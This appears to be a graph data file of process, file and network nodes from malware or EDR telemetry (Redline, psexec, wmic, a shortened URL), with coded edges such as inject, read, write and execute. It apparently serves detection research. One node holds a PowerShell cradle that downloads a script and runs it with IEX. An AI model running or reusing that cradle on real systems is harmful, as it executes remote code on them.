14
MP*-360TS_Setup_Mini_WW.OG.CPI202304_6.6.0.1054.exe
MP*-qgcrmeck.exe
MF-C:\Users\admin\AppData\Local\Temp\Document
TP-Dkeyauth.tmp 
MP-installd.exe
TP-Redline Activate.exe 
MF-temp\psexec.exe
TP*-DllHost.exe
TP*-wmic.exe
SO-https://abit.ly/lqy1dx#test@poscoplantec.co.kr
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-\Users\User\29630.ico
TP-services.exe
MP-olsptrs.exe 
30
0 1 FR
0 2 RD
1 2 WR
0 3 FR
1 3 IJ
3 2 RD
0 4 FR
1 4 UK
0 5 UK
3 6 WR
7 2 RD
3 7 IJ
7 6 WR
8 2 EX
3 8 IJ
8 6 WR
7 8 IJ
3 9 ST
9 7 RF
8 9 ST
3 10 ST
10 7 RF
10 8 RF
3 11 EX
7 11 UK
12 2 CD
3 12 IJ
12 6 WR
8 12 UK
13 6 UK

